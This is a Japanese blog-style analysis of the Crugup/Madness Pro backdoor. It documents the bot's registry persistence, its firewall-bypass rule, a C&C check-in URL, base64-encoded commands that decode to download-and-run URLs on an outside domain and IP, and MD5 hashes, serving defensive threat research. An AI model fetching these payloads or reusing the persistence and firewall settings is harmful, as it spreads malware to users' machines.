Crugup BKDR_CRUGUPウイルス サイト閲覧中に感染被害で強制インストール
 
イメージ 5
 
ネットサーフィン中にドライブバイ・ダウンロード攻撃食らってバックドア型ウイルス Crugup なるブツが問答無用で強制インストールされたっ! 無料ウイルス対策してない想定で
 
常駐するWindows向け実行ファイルは、システムに最初から存在するMicrosoft由来の「C:\Windows\System32\svchost.exe」と同じファイル名を名乗って偽装してました。 
 
レジストリ
 
起動用パラメータとして「z64_kernel」なるパラメータが指定されてます。他に「x86kernel2」というパラメータもあるみたい。
 
イメージ 2
 
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
値 → z64_kernel
データ → c:\users\[ユーザー名]\appdata\roaming\13****09\svchost.exe
 
バックドア自体のバージョン番号です。 (この場合は2.06)
 
HKEY_CURRENT_USER\Software\cppguru\
値 → mv
データ → Mi4wNg==
 
Windowsファイアウォールの設定を変更して外部通信のバイパスです。
 
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\
データ → v2.10|Action=Allow|Active=TRUE|Dir=In|App=c:\users\[ユーザー名]\appdata\roaming\13****09\svchost.exe|Name=madservice|
 
ファイル
 
感染したWindowsパソコンを遠隔操作するバックドアとして、8ケタのランダム数値がボット番号になる。
 
イメージ 1
 
> C:\Users\[ユーザー名]\AppData\Roaming\13****09\svchost.exe
 
C&Cサーバー
 
コチラで感染した時は命令コマンド「exe」となってて、何かしら実行ファイルをダウンロードしてきて起動し感染させるダウンローダーの役目を持ってました。
 
> updatebits[.]pw/mad/index.php?uid=13****09&ver=2.06&mk=3f**f1&os=Win07&rs=adm&c=*&rq=0
 
ZXhlPWh0dHA6Ly9hcm1vcnNlcnZlcnMuY29tL2MxNDhmYTQyMmQzNjI0NzRkNGQwZmVmOGFhNzAzZDQwYTE0ZC5leGU=
ZXhlPWh0dHA6Ly8xNDEuMTM4LjE1Ny4xNjMvd2lubG9nLmV4ZQ==
ZXhlPWh0dHA6Ly8xNDEuMTM4LjE1Ny4xNjMvd2lubXNjdHJsLmV4ZQ==
ZXhlPWh0dHA6Ly8xNDEuMTM4LjE1Ny4xNjMvd21kbGwuZXhl
 
関連するファイルのMD5ハッシュ値。。。
 
ca7259c7a76bfa6f3ddb8028a0c51595
7d68c22bba70f95da2097ec69e8991a8 <- Crugup
572b86a24af6f7562f03b96679c7b808 <- Crugup
8917adc00738016d11836b70b95a33f0
94f861337a6427fdac56750d48c08543
bf8c715eeea4c621faa95cfbbf2101d4
710f5ca7810714d65d3e10c788d1d283

セキュリティ会社の脅威情報

● Backdoor:Win32/Crugup.A Trojan:Win32/Qidmorks.A - Microsoft Malware Protection Center
● BKDR_CRUGUP.AD | 危険度: 低 | トレンドマイクロ:セキュリティ情報
http://about-threats.trendmicro.com/malware.aspx?language=jp&name=BKDR_CRUGUP.AD
 
● Win32/Pliskal.A | ESET Virusradar
http://www.virusradar.com/en/Win32_Pliskal.A/description 

MADNESSボット

「Crugup」はあくまでセキュリティ会社が勝手に付けた名前なので、真の正体が何なのか調べてみると、「MADNESS」「Madness Pro」なーんてな名称で提供されてるボットだそうで。
 
■ Blog | Cylance | A Study In Bots: Madness Pro
http://blog.cylance.com/a-study-in-bots-madness-pro

Malware don't need Coffee: Meet Madness Pro or Few days rise of a Ddos Botnet
http://malware.dontneedcoffee.com/2013/10/meet-madness-pro-or-few-days-rise-of.html?m=1
 
C&Cサーバーのルート上には、ロシア語で『注意! サイトが閉じてます。これはホスティングの料金未払いが原因かもしれません。テクニカルサポートに電話してください』なるナゾのメッセージが。
 
イメージ 3
 
MADNESSボットの管理画面にログインするページがありました。
 
イメージ 4
Madness Control Center
Madness system & Madness control panel © 2013 by C++ GURU team, based on sw^team product 2009-2015